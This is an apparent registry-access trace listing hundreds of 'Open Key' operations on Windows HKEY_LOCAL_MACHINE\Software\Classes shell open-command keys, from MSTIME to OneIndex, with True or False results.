Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTIME.TIMEFactory.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.5\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.6\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.7\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.8\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTSWebProxy.MSTSWebProxy\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTSWebProxy.MSTSWebProxy.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSCommon.LTS\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSCommon.LTS.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSDecWrp.DecObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSDecWrp.DecObj.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSEngine.TTSEngine\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSEngine.TTSEngine.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSFrontendENU.MSTTSFrontendENU\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSFrontendENU.MSTTSFrontendENU.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.EVR\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.EVR.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSEventBinder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSEventBinder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAnalogTunerDevice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAnalogTunerDevice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAudioRenderer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAudioRenderer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAudioRendererDevices\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAudioRendererDevices.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidBDATunerDevice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidBDATunerDevice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidCCA\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidCCA.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidClosedCaptioning\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidClosedCaptioning.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidClosedCaptioningSI\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidClosedCaptioningSI.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidCtl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidEncoder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidEncoder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidFeatures\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidFeatures.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidFilePlaybackDevice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidFilePlaybackDevice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidGenericSink\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidGenericSink.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidInputDevices\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidInputDevices.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidITVCapture\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidITVCapture.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidITVPlayback\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidITVPlayback.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidOutputDevices\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidOutputDevices.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferRecordingControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferRecordingControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferSink\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferSink.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferSource\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferSource.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferV2Source\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferV2Source.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVideoRenderer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVideoRenderer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVideoRendererDevices\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVideoRendererDevices.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVMR9\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVMR9.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidWebDVD\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidWebDVD.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidWebDVDAdm\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidWebDVDAdm.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSXML.DOMDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSXML.FreeThreadedDOMDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.DOMDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.DOMDocument.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.DOMDocument.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.DSOControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.DSOControl.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.FreeThreadedDOMDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.FreeThreadedDOMDocument.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.FreeThreadedDOMDocument.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.MXHTMLWriter.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.MXNamespaceManager.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.MXXMLWriter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.MXXMLWriter.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.MXXMLWriter.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXAttributes\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXAttributes.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXAttributes.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXXMLReader\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXXMLReader.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXXMLReader.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.ServerXMLHTTP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.ServerXMLHTTP.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.ServerXMLHTTP.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLHTTP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLHTTP.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLHTTP.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLParser\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLParser.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLSchemaCache\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLSchemaCache.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLSchemaCache.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XSLTemplate\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XSLTemplate.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XSLTemplate.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Mts.MtsGrp\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MTSAdmin.Catalog\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MTSAdmin.Catalog.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MTxAS.AppServer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MTxSpm.SharedPropertyGroupManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MTxSpm.SharedPropertyGroupManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Name.NameCtrl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Name.NameCtrl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NameControlServer.NameCtrl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NameControlServer.NameCtrl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NameTranslate\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbBaseDoc.NbBaseDocEdit\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbBaseDoc.NbBaseDocEdit.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Nbdoc.NBDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Nbdoc.NBDocument.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Nbdoc.Stationery\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Nbdoc.Stationery.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocCstg.NbDocCstg\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocCstg.NbDocCstg.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbAccessibleObject\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbAccessibleObject.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbDocView\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbDocView.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbRioEventSink\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbRioEventSink.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbImage.NbBitmapLayer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbImage.NbBitmapLayer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbImage.NbCompositeLayer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbImage.NbCompositeLayer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPage\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPage.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPageProp\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPageProp.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPageText\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPageText.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NCPjcal.PjCalendar3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NCProv.NCProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NCProv.NCProvider.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ndfapi.NDFAPI\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ndfapi.NDFAPI.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ndfapi.NetworkDiagnostics\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ndfapi.NetworkDiagnostics.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\netcenter.NCLUA\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\netcenter.NCLUA.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NetProjW.Elev\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NetProjW.Elev.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NetServer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Network\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NetworkConnections\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NetworkExplorerPlugins\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\new\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.AppEventsDHTMLConnector\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.AppEventsDHTMLConnector.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.ComCacheCleanup\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.ComCacheCleanup.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCDocConfig\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCDocConfig.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCProtocol\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCProtocol.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCVersionInfo\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCVersionInfo.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCViewExt\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCViewExt.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.NodeInitObject\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.NodeInitObject.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.ScopeTreeObject\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.ScopeTreeObject.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NumericResourceTable.NumericResourceTable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NumericTaskTable.NumericTaskTable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Object.Microsoft.DXTFilter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Object.Microsoft.DXTFilter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Object.Microsoft.DXTFilterCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Object.Microsoft.DXTFilterCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\objref\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OCHelper.BrowserHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OCHelper.BrowserHelper.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OcOffice.FormRegionContext\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OcOffice.OcForms\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OcOffice.OneNoteHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ocxfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ODBC.FileDSN\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odc.cube\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odc.database\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odc.new\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odc.table\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odc.tablecollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odccubefile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odcdatabasefile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ODCfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odcnewfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odctablecollectionfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odctablefile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odffile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odtfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.awsdc\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.awsdc.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.LocalSyncClient\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.LocalSyncClient.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.Query\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.QueryConstraints\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.QueryConstraintsBuilder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.Row\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.Session\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.StorageServer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficeCompatible.Application.x64\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficeCompatible.Application.x86\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficeListShortcut\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficePriv.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficeTheme\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficeTheme.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OldFont\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OLE DB Row Proxy\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OLE DB Row Server\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OLE DB Rowset Proxy\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OLE DB Rowset Server\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.AspHelp\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.AspHelp.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.DSPrintQueue\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.DSPrintQueue.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleCvt\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleCvt.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleInstall\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleInstall.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleSNMP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleSNMP.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.PrinterURL\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.PrinterURL.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OLETransactionManagers\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\omicaut.MathInputControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\oms\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneIndex.ShellFolder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneIndex.ShellFolder.1\Shell\Open\Command - False 1
Fn
